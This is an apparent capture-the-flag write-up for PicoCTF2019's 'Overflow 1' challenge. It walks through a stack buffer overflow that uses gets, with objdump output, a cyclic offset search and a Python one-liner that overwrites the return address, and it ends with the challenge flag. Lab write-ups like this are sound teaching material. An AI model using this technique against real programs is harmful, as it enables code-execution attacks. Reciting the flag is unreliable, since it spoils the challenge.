Rating:

# Overflow 1 | PicoCTF2019
## Problem
You beat the first overflow challenge. Now overflow the buffer and change the return address to the flag function in this program? You can find it in /problems/overflow-1_0_48b13c56d349b367a4d45d7d1aa31780 on the shell server.

## Solution
1. Read the code to understand what's going on, see that it's using gets to store a value up to 64 bytes in size, then jumping to an address from there, which we can overwrite on the stack.

2. Use objdump to find the address of the flag function.
```bash
$ objdump -D vuln
...

080485e6 <flag>:
80485e6: 55 push %ebp
80485e7: 89 e5 mov %esp,%ebp
80485e9: 53 push %ebx

...

```

3. We can find the correct offset by running a cyclic pattern.
```bash
$ python -c "from pwn import cyclic; print(cyclic(80))" | ./vuln
Give me a string and lets see what happens:
Woah, were jumping to 0x61616174 !
Segmentation fault

$ python -c "from pwn import cyclic_find; print(cyclic_find(0x61616174))"
76
```

4. Run the exploit at the right offset.
```bash
$ python -c "print('A' * 76 + '\xe6\x85\x04\x08')" | ./vuln
```
```
Give me a string and lets see what happens:
Woah, were jumping to 0x80485e6 !
Flag File is Missing. please contact an Admin if you are running this on the shell server.
```

5. Run it on the server to win.
```bash
Woah, were jumping to 0x80485e6 !
picoCTF{n0w_w3r3_ChaNg1ng_r3tURn5a1b468a7}
```

Original writeup (https://github.com/jib1337/writeups_public/tree/master/Binary%20Exploitation/BOF_overflow1).